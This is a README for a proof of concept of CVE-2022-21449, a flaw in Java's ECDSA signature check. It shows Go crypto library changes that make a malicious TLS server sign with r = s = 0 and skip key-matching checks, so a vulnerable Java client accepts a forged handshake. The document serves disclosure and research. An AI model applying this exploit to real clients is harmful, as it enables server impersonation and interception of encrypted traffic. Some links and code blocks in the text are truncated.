# CVE-2022-21449-TLS-PoC
CVE-2022-21449 ([also dubbed Psychic Signatures in the vulnerability writeup by Neil Madden]( Proof of Concept demonstrating its usage with a vulnerable client and a malicious TLS server.

The malicious server presents a valid (as of 2022-04-20) cert chain for which has an ECDSA pub key (secp256r1). However, the `crypto/ecdsa` package has been modified to present an invalid signature with `r = s = 0`. The vulnerable client accepts this invalid signature, allowing the rest of the TLS handshake to continue.

Aside from the removed `*_test.go` files while building & exploration, [these modifications to the golang crypto library](#modifications-to-the-golang-crypto-library) were necessary for the malicious TLS server. They can also be found by searching/grepping for `CVE-2022-21449` in the `go/src` directory.

# Building
Requires some existing golang installation as well as maven, then run `./`.

Tested on Ubuntu 20.04.4 LTS (WSL2) with OpenJDK 16.0.1 (build 16.0.1+9-Ubuntu-120.04, 2021-04-20)

# Demo

# Modifications to the golang crypto library

In `crypto/ecdsa/ecdsa.go`, the function `signGeneric` was essentially modified to:
func signGeneric(priv *PrivateKey, csprng *cipher.StreamReader, c elliptic.Curve, hash []byte) (r, s *big.Int, err error) {
        // SEC 1, Version 2.0, Section 4.1.3
        // CVE-2022-21449 - Modified and removed all calculations. Return r = s = 0
        r = new(big.Int)
        s = new(big.Int)

And in `crypto/tls/tls.go`, the function `X509KeyPair` has been changed to disable verification checks that a given private key matches the X.509 certificate's public key for ECDSA public keys:
// X509KeyPair parses a public/private key pair from a pair of
// PEM encoded data. On successful return, Certificate.Leaf will be nil because
// the parsed form of the certificate is not retained.
func X509KeyPair(certPEMBlock, keyPEMBlock []byte) (Certificate, error) {
        fail := func(err error) (Certificate, error) { return Certificate{}, err }
        switch pub := x509Cert.PublicKey.(type) {
        case *ecdsa.PublicKey:
                // CVE-2022-21449: Modified checks away
                _, ok := cert.PrivateKey.(*ecdsa.PrivateKey)
                if !ok {
                        return fail(errors.New("tls: private key type does not match public key type"))
                /*if pub.X.Cmp(priv.X) != 0 || pub.Y.Cmp(priv.Y) != 0 {
                        return fail(errors.New("tls: private key does not match public key"))

# Credits
- [Neil Madden]( finding and disclosing CVE-2022-21449, as [detailed in their excellent writeup](
- [Khaled Nassar]( This PoC.